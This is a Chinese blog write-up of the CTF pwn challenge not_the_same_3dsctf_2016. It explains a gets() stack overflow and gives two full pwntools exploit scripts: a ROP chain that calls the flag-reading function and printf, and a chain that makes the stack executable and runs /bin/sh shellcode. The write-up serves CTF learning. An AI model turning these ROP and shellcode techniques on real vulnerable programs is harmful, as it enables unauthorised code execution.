【CTF】not_the_same_3dsctf_2016

最新推荐文章于 2023-03-14 21:47:57 发布
最新推荐文章于 2023-03-14 21:47:57 发布
阅读量3.7k 收藏 4
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011317663/article/details/122753166
版权

解题思路

1 先反编译,找到mian函数

undefined4 main(void)
{
  char local_2d [45];
  
  printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... ");
  gets(local_2d);
  return 0;
}

一看到gets,就觉得靠谱了。

2 下一步找可利用函数,构造利用链。随便翻函数列表,没找到system以及/bin/sh,说明没有可以直接获取shell的方法;再继续翻,看到了get_secret函数,以及_dl_make_stack_executable函数,其中
get_secret函数为:

void get_secret(void)
{
  FILE *__stream;
  
  __stream = fopen("flag.txt","r");
  fgets(fl4g,0x2d,__stream);
  fclose(__stream);
  return;
}

可以看到,为获取flag的函数,那说明最低有两条路径可以尝试
1)利用get_secret获取flag
2)利用_dl_make_stack_executable执行shellcode

3 先尝试get_secret,毕竟线索很明显嘛。要利用get_secret需要有以下两个步骤.

  1. 跳转到get_secret执行。
  2. 显示fl4g
    第一步好解决,找到溢出点后直接跳转就行;如何显示fl4g,一个思路就是找到显示函数如main函数中的printf,将参数替换掉就行,这个理论上讲也是常规操作, 在32位上就参数从右到左压栈,然后跟函数地址嘛。谁知我又too young了,不行,分析了一通,发现程序中都是用call xxx的方式调用函数,传参从汇编代码看也不是直接压栈的,而是间接通过esp加减的方式,看的很懵逼,最后成功执行的时候才确定压栈传参可行。好了,剩下就是找gadget了,也是一通折腾,总算找到。脚本如下:
   from pwn import *

elf = ELF('./not_the_same_3dsctf_2016')
#sh = remote('127.0.0.1', 1299)
sh = process('./not_the_same_3dsctf_2016')
#sh.recvuntil('... ') # 没有换行符,不返回...
rop = b'\x90' * 45
rop += p32(0x080489a0) # get_secret
rop += p32(0x0809e3e6) # pop esi,pop edi,ret
rop += p32(0x080eca2d) # fl4g
rop += p32(0x0804f0a0) # printf
rop += p32(0x0807b789) # push esi, call edi
with open('payload.txt', 'wb') as f:
    f.write(rop)
sh.sendline(rop)
print(sh.recvline())
sh.interactive()

4 上面这个方法搞定了,想着复习下_dl_make_stack_executable方式呗,方法与前面get_started_3dsctf_2016那道题基本一样,就是要重新找gadget而已。

from pwn import *

elf = ELF('./not_the_same_3dsctf_2016')
#sh = remote('127.0.0.1', 1299)
sh = process('./not_the_same_3dsctf_2016')
#sh.recvuntil('... ')
shellcode = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
rop = b'\x90' * 45
rop += p32(0x0806fcca) # pop edx,ret
rop += p32(0x080eafec) # __stack_prot
rop += p32(0x08048b0b) # pop eax,ret 
rop += p32(7) # 7
rop += p32(0x0805586b) # mov dword [edx], eax, ret
rop += p32(0x08048b0b) # pop eax, ret
rop += p32(0x080eafc8) # __libc_stack_end
rop += p32(0x0809ae10) # _dl_make_stack_executable
#rop += p32(0x080494f0) # __libc_csu_fini 栈平衡,32位不需要
rop += p32(0x080b9113) # push esp, ret
rop += shellcode
with open('payloadb.txt', 'wb') as f:
    f.write(rop)

sh.sendline(rop)
sh.interactive()

总结:

到目前为止,基本每道题都有不同的知识点,像本题就需要搞清楚call那个玩意。慢慢学习,慢慢成长。

delta_hell
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF_snow_隐写工具
05-19
CTF_snow_隐写工具,找了好久才找到,非常好用,打CTF比赛必备!!!
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
【BUUCTFPWN】not_the_same_3dsctf_2016
m0_55368674的博客
01-12 316
【BUUCTF - PWN】not_the_same_3dsctf_2016题解
not_the_same_3dsctf_2016 wp (python3)
Kata_Jhin的博客
03-14 135
not_the_same_3dsctf_2016 wp (python3)
not_the_same_3dsctf_2016【简单解法和mprotect解法】
qq_41696518的博客
08-29 639
not_the_same_3dsctf_2016,含mprotect解法和常规解法
not_the_same_3dsctf_2016
m0_52231248的博客
11-09 186
not_the_same_3dsctf_2016 Ubuntu16 checksec一下 ida: Gets函数存在溢出点offest=0x2d Main函数上面就是后门函数,给我们将flag.txt读入bss段 找到读入的flag地址 我们只需要printf打印一下就行了 远端还需要我们正常退出函数,找一下exit() 因为是静态编译的,所以基本所有函数都会有直接构造exp: from pwn import* context(log_level="deb.
vhe.rar_At the Same Time
09-23
Multi-threaded mode at the same time a number of tasks
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 411
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
BUUCTF-not_the_same_3dsctf_2016
Fzuim的博客
03-03 1526
这是一道pwn题目IDA查看伪代码查看编译属性思路1,本地可打通,远程不行思路2,正确解法答案 IDA查看伪代码 main函数gets函数存在栈溢出攻击 通过查看字符串列表,发现有个get_secret读取flag.txt后门函数 查看编译属性 思路1,本地可打通,远程不行 也是最简单的,payload构造溢出返回到get_secret函数,并printf打印出fl4g,payload如下 #coding=utf8 from pwn import * context.log_level = 'deb
CTF buuoj pwn-----第11题: not_the_same_3dsctf_2016
bing_Max的博客
09-30 1188
前言 bss是指那些没有初始化的和初始化为0的全局变量 bss类型的全局变量只占运行时的内存空间,而不占文件空间。 data类型的全局变量是既占文件空间,又占用运行时内存空间的。 rodata 的意义同样明显,ro代表read only,即只读数据(const) 在运行过程中不会改变的数据设为 rodata 类型的,是有很多好处的:在多个进程间共享,可以大大提高空间利用率,甚至不占用RAM空间。同时由于 rodata 在只读的内存页面(page)中,是受保护的,任何试图对它的修改都会被及
BUUCTF not_the_same_3dsctf_2016
红叶的博客
10-31 176
本题目本地与远程得用两种方案打。
[BUUCTF-pwn]——not_the_same_3dsctf_2016
Y_peak的博客
02-10 706
not_the_same_3dsctf_2016 题目地址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 首先checksec一下,看看32位程序 在IDA中,发现栈溢出典型函数gets函数,这里注意这个main函数没有ebp shift+F12看下,发现了flag.txt这种敏感 字符串 找到调用的函数get_secret函数 函数调用后,flag储存在fl4g里面,我们找到fl4g的位置 找到可以输出的write函数 下面我们就可
buuctf|pwn-not_the_same_3dsctf_2016-wp
l2645470582_的博客
11-08 286
1.检查保护机制 我们看到开了堆的保护 2.用32为的IDA打开该文件 shift+f12查看关键字符串,我们看到有‘flag.txt’关键字符 我们就查找出后门函数的地址:0x080489A0 我们看到读取flag.txt,注意fgets函数,就是在f14g里面读取45个字符,我们猜测这就是flag 3.我们查看main函数里面有什么 我们看到gets(&v4)有个溢出,我们看到v4地址是0x2D 4.rop ...
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 510
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值